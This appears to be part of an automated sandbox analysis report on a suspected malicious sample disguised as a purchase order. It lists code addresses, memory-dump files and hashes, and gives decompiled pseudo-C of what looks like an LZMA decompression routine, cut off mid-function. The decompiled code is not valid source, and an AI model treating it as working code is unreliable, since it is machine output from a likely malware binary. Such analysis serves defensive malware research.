                                                                                                                          0x00406316
                                                                                                                          0x00406323
                                                                                                                          0x0040632b
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062e2
                                                                                                                          0x004062e2
                                                                                                                          0x004062e6
                                                                                                                          0x00406b31
                                                                                                                          0x00000000
                                                                                                                          0x00406b31
                                                                                                                          0x004062f2
                                                                                                                          0x004062fd
                                                                                                                          0x004062fd
                                                                                                                          0x004062fd
                                                                                                                          0x00406300
                                                                                                                          0x00406303
                                                                                                                          0x00406306
                                                                                                                          0x0040630b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004069a2
                                                                                                                          0x004069a2
                                                                                                                          0x004069a8
                                                                                                                          0x004069ae
                                                                                                                          0x004069b4
                                                                                                                          0x004069ce
                                                                                                                          0x004069d1
                                                                                                                          0x004069d7
                                                                                                                          0x004069e2
                                                                                                                          0x004069e4
                                                                                                                          0x004069b6
                                                                                                                          0x004069b6
                                                                                                                          0x004069c5
                                                                                                                          0x004069c9
                                                                                                                          0x004069c9
                                                                                                                          0x004069ee
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406333
                                                                                                                          0x00406335
                                                                                                                          0x00406338
                                                                                                                          0x004063a9
                                                                                                                          0x004063ac
                                                                                                                          0x004063af
                                                                                                                          0x004063b6
                                                                                                                          0x004063c0
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040633a
                                                                                                                          0x0040633e
                                                                                                                          0x00406341
                                                                                                                          0x00406343
                                                                                                                          0x00406346
                                                                                                                          0x00406349
                                                                                                                          0x0040634b
                                                                                                                          0x0040634e
                                                                                                                          0x00406350
                                                                                                                          0x00406355
                                                                                                                          0x00406358
                                                                                                                          0x0040635b
                                                                                                                          0x0040635f
                                                                                                                          0x00406366
                                                                                                                          0x00406369
                                                                                                                          0x00406370
                                                                                                                          0x00406374
                                                                                                                          0x0040637c
                                                                                                                          0x0040637c
                                                                                                                          0x0040637c
                                                                                                                          0x00406376
                                                                                                                          0x00406376
                                                                                                                          0x00406376
                                                                                                                          0x0040636b
                                                                                                                          0x0040636b
                                                                                                                          0x0040636b
                                                                                                                          0x00406380
                                                                                                                          0x00406383
                                                                                                                          0x004063a1
                                                                                                                          0x004063a3
                                                                                                                          0x00000000
                                                                                                                          0x00406385
                                                                                                                          0x00406385
                                                                                                                          0x00406388
                                                                                                                          0x0040638b
                                                                                                                          0x0040638e
                                                                                                                          0x00406390
                                                                                                                          0x00406390
                                                                                                                          0x00406390
                                                                                                                          0x00406393
                                                                                                                          0x00406396
                                                                                                                          0x00406398
                                                                                                                          0x00406399
                                                                                                                          0x0040639c
                                                                                                                          0x00000000
                                                                                                                          0x0040639c
                                                                                                                          0x00000000
                                                                                                                          0x004065d2
                                                                                                                          0x004065d6
                                                                                                                          0x004065f4
                                                                                                                          0x004065f7
                                                                                                                          0x004065fe
                                                                                                                          0x00406601
                                                                                                                          0x00406604
                                                                                                                          0x00406607
                                                                                                                          0x0040660a
                                                                                                                          0x0040660d
                                                                                                                          0x0040660f
                                                                                                                          0x00406616
                                                                                                                          0x00406617
                                                                                                                          0x00406619
                                                                                                                          0x0040661c
                                                                                                                          0x0040661f
                                                                                                                          0x00406622
                                                                                                                          0x00406622
                                                                                                                          0x00406627
                                                                                                                          0x00000000
                                                                                                                          0x00406627
                                                                                                                          0x004065d8
                                                                                                                          0x004065db
                                                                                                                          0x004065de
                                                                                                                          0x004065e8
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040663c
                                                                                                                          0x00406640
                                                                                                                          0x00406663
                                                                                                                          0x00406666
                                                                                                                          0x00406669
                                                                                                                          0x00406673
                                                                                                                          0x00406642
                                                                                                                          0x00406642
                                                                                                                          0x00406645
                                                                                                                          0x00406648
                                                                                                                          0x0040664b
                                                                                                                          0x00406658
                                                                                                                          0x0040665b
                                                                                                                          0x0040665b
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040667f
                                                                                                                          0x00406683
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406689
                                                                                                                          0x0040668d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406693
                                                                                                                          0x00406695
                                                                                                                          0x00406699
                                                                                                                          0x00406699
                                                                                                                          0x0040669c
                                                                                                                          0x004066a0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406717
                                                                                                                          0x0040671b
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040671d
                                                                                                                          0x0040671d
                                                                                                                          0x0040671d
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067d7
                                                                                                                          0x004067d7
                                                                                                                          0x004067db
                                                                                                                          0x00406b79
                                                                                                                          0x00000000
                                                                                                                          0x00406b79
                                                                                                                          0x004067e1
                                                                                                                          0x004067e4
                                                                                                                          0x004067e7
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f4
                                                                                                                          0x004067f6
                                                                                                                          0x004067f6
                                                                                                                          0x004067f6
                                                                                                                          0x004067f9
                                                                                                                          0x004067fc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063cc
                                                                                                                          0x004063cc
                                                                                                                          0x004063d0
                                                                                                                          0x00406b3d
                                                                                                                          0x00000000
                                                                                                                          0x00406b3d
                                                                                                                          0x004063d6
                                                                                                                          0x004063d9
                                                                                                                          0x004063dc
                                                                                                                          0x004063e0
                                                                                                                          0x004063e3
                                                                                                                          0x004063e9
                                                                                                                          0x004063eb
                                                                                                                          0x004063eb
                                                                                                                          0x004063eb
                                                                                                                          0x004063ee
                                                                                                                          0x004063f1
                                                                                                                          0x004063f1
                                                                                                                          0x004063f4
                                                                                                                          0x004063f7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063fd
                                                                                                                          0x00406403
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406409
                                                                                                                          0x00406409
                                                                                                                          0x0040640d
                                                                                                                          0x00406410
                                                                                                                          0x00406413
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641d
                                                                                                                          0x0040641f
                                                                                                                          0x00406425
                                                                                                                          0x00406428
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00406431
                                                                                                                          0x00406434
                                                                                                                          0x00406437
                                                                                                                          0x00406453
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645c
                                                                                                                          0x00406463
                                                                                                                          0x00406467
                                                                                                                          0x00406469
                                                                                                                          0x0040646d
                                                                                                                          0x00406439
                                                                                                                          0x00406439
                                                                                                                          0x0040643d
                                                                                                                          0x00406445
                                                                                                                          0x0040644a
                                                                                                                          0x0040644c
                                                                                                                          0x0040644e
                                                                                                                          0x0040644e
                                                                                                                          0x00406470
                                                                                                                          0x00406477
                                                                                                                          0x0040647a
                                                                                                                          0x00000000
                                                                                                                          0x00406480
                                                                                                                          0x00000000
                                                                                                                          0x00406480
                                                                                                                          0x00000000
                                                                                                                          0x00406485
                                                                                                                          0x00406485
                                                                                                                          0x00406489
                                                                                                                          0x00406b49
                                                                                                                          0x00000000
                                                                                                                          0x00406b49
                                                                                                                          0x0040648f
                                                                                                                          0x00406492
                                                                                                                          0x00406495
                                                                                                                          0x00406499
                                                                                                                          0x0040649c
                                                                                                                          0x004064a2
                                                                                                                          0x004064a4
                                                                                                                          0x004064a4
                                                                                                                          0x004064a4
                                                                                                                          0x004064a7
                                                                                                                          0x004064aa
                                                                                                                          0x004064aa
                                                                                                                          0x004064aa
                                                                                                                          0x004064b0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004064b2
                                                                                                                          0x004064b5
                                                                                                                          0x004064b8
                                                                                                                          0x004064bb
                                                                                                                          0x004064be
                                                                                                                          0x004064c1
                                                                                                                          0x004064c4
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064cd
                                                                                                                          0x004064d0
                                                                                                                          0x004064e8
                                                                                                                          0x004064eb
                                                                                                                          0x004064ee
                                                                                                                          0x004064f1
                                                                                                                          0x004064f1
                                                                                                                          0x004064f4
                                                                                                                          0x004064f8
                                                                                                                          0x004064fa
                                                                                                                          0x004064d2
                                                                                                                          0x004064d2
                                                                                                                          0x004064da
                                                                                                                          0x004064df
                                                                                                                          0x004064e1
                                                                                                                          0x004064e3
                                                                                                                          0x004064e3
                                                                                                                          0x004064fd
                                                                                                                          0x00406504
                                                                                                                          0x00406507
                                                                                                                          0x00000000
                                                                                                                          0x00406509
                                                                                                                          0x00000000
                                                                                                                          0x00406509
                                                                                                                          0x00406507
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406549
                                                                                                                          0x00406549
                                                                                                                          0x0040654d
                                                                                                                          0x00406b55
                                                                                                                          0x00000000
                                                                                                                          0x00406b55
                                                                                                                          0x00406553
                                                                                                                          0x00406556
                                                                                                                          0x00406559
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406566
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x0040656b
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x00406574
                                                                                                                          0x00406512
                                                                                                                          0x00406512
                                                                                                                          0x00406515
                                                                                                                          0x00000000
                                                                                                                          0x00406515
                                                                                                                          0x00406576
                                                                                                                          0x00406576
                                                                                                                          0x00406579
                                                                                                                          0x0040657c
                                                                                                                          0x0040657f
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00406588
                                                                                                                          0x0040658b
                                                                                                                          0x0040658e
                                                                                                                          0x00406591
                                                                                                                          0x00406594
                                                                                                                          0x004065ac
                                                                                                                          0x004065af
                                                                                                                          0x004065b2
                                                                                                                          0x004065b5
                                                                                                                          0x004065b5
                                                                                                                          0x004065b8
                                                                                                                          0x004065bc
                                                                                                                          0x004065be
                                                                                                                          0x00406596
                                                                                                                          0x00406596
                                                                                                                          0x0040659e
                                                                                                                          0x004065a3
                                                                                                                          0x004065a5
                                                                                                                          0x004065a7
                                                                                                                          0x004065a7
                                                                                                                          0x004065c1
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x0040685a
                                                                                                                          0x0040685e
                                                                                                                          0x00406b85
                                                                                                                          0x00000000
                                                                                                                          0x00406b85
                                                                                                                          0x00406864
                                                                                                                          0x00406867
                                                                                                                          0x0040686a
                                                                                                                          0x0040686e
                                                                                                                          0x00406871
                                                                                                                          0x00406877
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x0040687c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406969
                                                                                                                          0x0040696d
                                                                                                                          0x0040698f
                                                                                                                          0x00406992
                                                                                                                          0x0040699c
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040696f
                                                                                                                          0x00406972
                                                                                                                          0x00406976
                                                                                                                          0x00406979
                                                                                                                          0x00406979
                                                                                                                          0x0040697c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a26
                                                                                                                          0x00406a2a
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a4f
                                                                                                                          0x00406a56
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a5d
                                                                                                                          0x00000000
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a2c
                                                                                                                          0x00406a2f
                                                                                                                          0x00406a32
                                                                                                                          0x00406a35
                                                                                                                          0x00406a3c
                                                                                                                          0x00406980
                                                                                                                          0x00406980
                                                                                                                          0x00406983
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406b17
                                                                                                                          0x00406b1a
                                                                                                                          0x00406a1b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406751
                                                                                                                          0x00406753
                                                                                                                          0x0040675a
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406768
                                                                                                                          0x0040676b
                                                                                                                          0x0040676e
                                                                                                                          0x00406770
                                                                                                                          0x00406772
                                                                                                                          0x00406772
                                                                                                                          0x00406773
                                                                                                                          0x00406776
                                                                                                                          0x0040677d
                                                                                                                          0x00406780
                                                                                                                          0x0040678e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a64
                                                                                                                          0x00406a64
                                                                                                                          0x00406a67
                                                                                                                          0x00406a6e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a73
                                                                                                                          0x00406a73
                                                                                                                          0x00406a77
                                                                                                                          0x00406baf
                                                                                                                          0x00000000
                                                                                                                          0x00406baf
                                                                                                                          0x00406a7d
                                                                                                                          0x00406a80
                                                                                                                          0x00406a83
                                                                                                                          0x00406a87
                                                                                                                          0x00406a8a
                                                                                                                          0x00406a90
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a95
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a9f
                                                                                                                          0x00406aff
                                                                                                                          0x00406b02
                                                                                                                          0x00406b07
                                                                                                                          0x00406b08
                                                                                                                          0x00406b0a
                                                                                                                          0x00406b0c
                                                                                                                          0x00406b0f
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1b
                                                                                                                          0x00000000
                                                                                                                          0x00406a21
                                                                                                                          0x00406a1b
                                                                                                                          0x00406aa1
                                                                                                                          0x00406aa7
                                                                                                                          0x00406aaa
                                                                                                                          0x00406aad
                                                                                                                          0x00406ab0
                                                                                                                          0x00406ab3
                                                                                                                          0x00406ab6
                                                                                                                          0x00406ab9
                                                                                                                          0x00406abc
                                                                                                                          0x00406abf
                                                                                                                          0x00406ac2
                                                                                                                          0x00406adb
                                                                                                                          0x00406ade
                                                                                                                          0x00406ae1
                                                                                                                          0x00406ae4
                                                                                                                          0x00406ae8
                                                                                                                          0x00406aea
                                                                                                                          0x00406aea
                                                                                                                          0x00406aeb
                                                                                                                          0x00406aee
                                                                                                                          0x00406ac4
                                                                                                                          0x00406ac4
                                                                                                                          0x00406acc
                                                                                                                          0x00406ad1
                                                                                                                          0x00406ad3
                                                                                                                          0x00406ad6
                                                                                                                          0x00406ad6
                                                                                                                          0x00406af1
                                                                                                                          0x00406af8
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00000000
                                                                                                                          0x00406796
                                                                                                                          0x00406799
                                                                                                                          0x004067cf
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x00406902
                                                                                                                          0x00406902
                                                                                                                          0x00406905
                                                                                                                          0x00406907
                                                                                                                          0x00406b91
                                                                                                                          0x00000000
                                                                                                                          0x00406b91
                                                                                                                          0x0040690d
                                                                                                                          0x00406910
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406916
                                                                                                                          0x0040691a
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x00000000
                                                                                                                          0x0040691d
                                                                                                                          0x0040679b
                                                                                                                          0x0040679d
                                                                                                                          0x0040679f
                                                                                                                          0x004067a1
                                                                                                                          0x004067a4
                                                                                                                          0x004067a5
                                                                                                                          0x004067a7
                                                                                                                          0x004067a9
                                                                                                                          0x004067ac
                                                                                                                          0x004067af
                                                                                                                          0x004067c5
                                                                                                                          0x004067ca
                                                                                                                          0x00406802
                                                                                                                          0x00406802
                                                                                                                          0x00406806
                                                                                                                          0x00406832
                                                                                                                          0x00406834
                                                                                                                          0x0040683b
                                                                                                                          0x0040683e
                                                                                                                          0x00406841
                                                                                                                          0x00406841
                                                                                                                          0x00406846
                                                                                                                          0x00406846
                                                                                                                          0x00406848
                                                                                                                          0x0040684b
                                                                                                                          0x00406852
                                                                                                                          0x00406855
                                                                                                                          0x00406882
                                                                                                                          0x00406882
                                                                                                                          0x00406885
                                                                                                                          0x00406888
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x00000000
                                                                                                                          0x004068fc
                                                                                                                          0x0040688a
                                                                                                                          0x00406890
                                                                                                                          0x00406893
                                                                                                                          0x00406896
                                                                                                                          0x00406899
                                                                                                                          0x0040689c
                                                                                                                          0x0040689f
                                                                                                                          0x004068a2
                                                                                                                          0x004068a5
                                                                                                                          0x004068a8
                                                                                                                          0x004068ab
                                                                                                                          0x004068c4
                                                                                                                          0x004068c6
                                                                                                                          0x004068c9
                                                                                                                          0x004068ca
                                                                                                                          0x004068cd
                                                                                                                          0x004068cf
                                                                                                                          0x004068d2
                                                                                                                          0x004068d4
                                                                                                                          0x004068d6
                                                                                                                          0x004068d9
                                                                                                                          0x004068db
                                                                                                                          0x004068de
                                                                                                                          0x004068e2
                                                                                                                          0x004068e4
                                                                                                                          0x004068e4
                                                                                                                          0x004068e5
                                                                                                                          0x004068e8
                                                                                                                          0x004068eb
                                                                                                                          0x004068ad
                                                                                                                          0x004068ad
                                                                                                                          0x004068b5
                                                                                                                          0x004068ba
                                                                                                                          0x004068bc
                                                                                                                          0x004068bf
                                                                                                                          0x004068bf
                                                                                                                          0x004068ee
                                                                                                                          0x004068f5
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x004068f5
                                                                                                                          0x00406808
                                                                                                                          0x0040680b
                                                                                                                          0x0040680d
                                                                                                                          0x00406810
                                                                                                                          0x00406813
                                                                                                                          0x00406816
                                                                                                                          0x00406818
                                                                                                                          0x0040681b
                                                                                                                          0x0040681e
                                                                                                                          0x0040681e
                                                                                                                          0x00406821
                                                                                                                          0x00406821
                                                                                                                          0x00406824
                                                                                                                          0x0040682b
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x0040682b
                                                                                                                          0x004067b1
                                                                                                                          0x004067b4
                                                                                                                          0x004067b6
                                                                                                                          0x004067b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406518
                                                                                                                          0x00406518
                                                                                                                          0x0040651c
                                                                                                                          0x00406b61
                                                                                                                          0x00000000
                                                                                                                          0x00406b61
                                                                                                                          0x00406522
                                                                                                                          0x00406525
                                                                                                                          0x00406528
                                                                                                                          0x0040652b
                                                                                                                          0x0040652e
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406536
                                                                                                                          0x00406539
                                                                                                                          0x0040653c
                                                                                                                          0x0040653f
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066a3
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x00406b6d
                                                                                                                          0x00000000
                                                                                                                          0x00406b6d
                                                                                                                          0x004066ad
                                                                                                                          0x004066b0
                                                                                                                          0x004066b3
                                                                                                                          0x004066b6
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066bb
                                                                                                                          0x004066be
                                                                                                                          0x004066c1
                                                                                                                          0x004066c4
                                                                                                                          0x004066c7
                                                                                                                          0x004066ca
                                                                                                                          0x004066cb
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066d0
                                                                                                                          0x004066d3
                                                                                                                          0x004066d6
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066de
                                                                                                                          0x004066de
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406924
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040692a
                                                                                                                          0x0040692d
                                                                                                                          0x00406930
                                                                                                                          0x00406933
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406938
                                                                                                                          0x0040693b
                                                                                                                          0x0040693e
                                                                                                                          0x00406941
                                                                                                                          0x00406944
                                                                                                                          0x00406947
                                                                                                                          0x00406948
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694d
                                                                                                                          0x00406950
                                                                                                                          0x00406953
                                                                                                                          0x00406956
                                                                                                                          0x00406959
                                                                                                                          0x0040695d
                                                                                                                          0x0040695f
                                                                                                                          0x00406962
                                                                                                                          0x00000000
                                                                                                                          0x00406964
                                                                                                                          0x004066e1
                                                                                                                          0x004066e1
                                                                                                                          0x00000000
                                                                                                                          0x004066e1
                                                                                                                          0x00406962
                                                                                                                          0x00406b97
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061c6
                                                                                                                          0x00406bce
                                                                                                                          0x00406bce
                                                                                                                          0x00000000
                                                                                                                          0x00406bce
                                                                                                                          0x00406a1b
                                                                                                                          0x004069a2
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x004066f4

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
                                                                                                                          • Instruction ID: 7be6eb69932b41c0b27de07e5fb880b338722213318b425ba270fb710fdbb197
                                                                                                                          • Opcode Fuzzy Hash: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
                                                                                                                          • Instruction Fuzzy Hash: FE714671E00228CBDF28CF98C8447ADBBB1FB44305F15816ED856BB281C778AA96DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040663C Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E0040663C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
